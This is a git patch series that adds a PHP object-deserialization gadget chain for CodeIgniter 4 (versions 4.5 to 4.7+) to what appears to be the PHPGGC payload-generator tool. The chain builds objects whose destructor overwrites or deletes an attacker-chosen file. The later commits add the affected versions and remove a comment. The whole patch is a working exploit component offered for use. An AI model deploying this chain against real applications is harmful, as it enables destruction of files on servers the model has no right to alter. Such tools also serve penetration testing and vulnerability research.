From 5234abace326fcdc6864dd60d0849ce631fd4696 Mon Sep 17 00:00:00 2001 From: reverseth Date: Sun, 26 Oct 2025 22:54:48 +0100 Subject: [PATCH 1/3] Adding File Delete for CodeIgniter framework --- gadgetchains/CodeIgniter4/FD/3/chain.php | 19 +++++++++++++++ gadgetchains/CodeIgniter4/FD/3/gadgets.php | 27 ++++++++++++++++++++++ 2 files changed, 46 insertions(+) create mode 100644 gadgetchains/CodeIgniter4/FD/3/chain.php create mode 100644 gadgetchains/CodeIgniter4/FD/3/gadgets.php diff --git a/gadgetchains/CodeIgniter4/FD/3/chain.php b/gadgetchains/CodeIgniter4/FD/3/chain.php new file mode 100644 index 00000000..044c94f8 --- /dev/null +++ b/gadgetchains/CodeIgniter4/FD/3/chain.php @@ -0,0 +1,19 @@ + \'\',);" It is also possible to choose a string to write inside the array (" \'\',);"), but I did not find a way to execute it. Thus, I decided to push it as a FD, and not as a FW.'; + + public function generate(array $parameters) + { + + $obj = new \CodeIgniter\Autoloader\FileLocatorCached($parameters['remote_path']); + $obj->cacheHandler = new \CodeIgniter\Cache\FactoriesCache\FileVarExportHandler(); + return $obj; + } +} \ No newline at end of file diff --git a/gadgetchains/CodeIgniter4/FD/3/gadgets.php b/gadgetchains/CodeIgniter4/FD/3/gadgets.php new file mode 100644 index 00000000..ebd2a758 --- /dev/null +++ b/gadgetchains/CodeIgniter4/FD/3/gadgets.php @@ -0,0 +1,27 @@ +cacheKey = $remote_path; + } + } +} \ No newline at end of file From 05ac6921b037962c54c13b90d4822763d8de24a4 Mon Sep 17 00:00:00 2001 From: reverseth Date: Sun, 26 Oct 2025 23:09:22 +0100 Subject: [PATCH 2/3] Add impaced versions --- gadgetchains/CodeIgniter4/FD/3/chain.php | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/gadgetchains/CodeIgniter4/FD/3/chain.php b/gadgetchains/CodeIgniter4/FD/3/chain.php index 044c94f8..90f2ab99 100644 --- a/gadgetchains/CodeIgniter4/FD/3/chain.php +++ b/gadgetchains/CodeIgniter4/FD/3/chain.php @@ -4,7 +4,7 @@ class FD3 extends \PHPGGC\GadgetChain\FileDelete { - public static $version = ''; + public static $version = '4.5 <= 4.7+'; public static $vector = '__destruct'; public static $author = 'reverseth'; public static $information = 'Actually, this POP chain writes (or replaces the content of) the choosen file with the following content : " \'\',);" It is also possible to choose a string to write inside the array (" \'\',);"), but I did not find a way to execute it. Thus, I decided to push it as a FD, and not as a FW.'; From 942a24a715c961b47a41f845cc33f881963c1259 Mon Sep 17 00:00:00 2001 From: reverseth Date: Sun, 26 Oct 2025 23:15:06 +0100 Subject: [PATCH 3/3] Removing unnecessary comment --- gadgetchains/CodeIgniter4/FD/3/chain.php | 1 - gadgetchains/CodeIgniter4/FD/3/gadgets.php | 2 -- 2 files changed, 3 deletions(-) diff --git a/gadgetchains/CodeIgniter4/FD/3/chain.php b/gadgetchains/CodeIgniter4/FD/3/chain.php index 90f2ab99..a26ce77b 100644 --- a/gadgetchains/CodeIgniter4/FD/3/chain.php +++ b/gadgetchains/CodeIgniter4/FD/3/chain.php @@ -11,7 +11,6 @@ class FD3 extends \PHPGGC\GadgetChain\FileDelete public function generate(array $parameters) { - $obj = new \CodeIgniter\Autoloader\FileLocatorCached($parameters['remote_path']); $obj->cacheHandler = new \CodeIgniter\Cache\FactoriesCache\FileVarExportHandler(); return $obj; diff --git a/gadgetchains/CodeIgniter4/FD/3/gadgets.php b/gadgetchains/CodeIgniter4/FD/3/gadgets.php index ebd2a758..feaa7974 100644 --- a/gadgetchains/CodeIgniter4/FD/3/gadgets.php +++ b/gadgetchains/CodeIgniter4/FD/3/gadgets.php @@ -5,8 +5,6 @@ class FileVarExportHandler { public $path = ""; - - //public function __construct() {} } }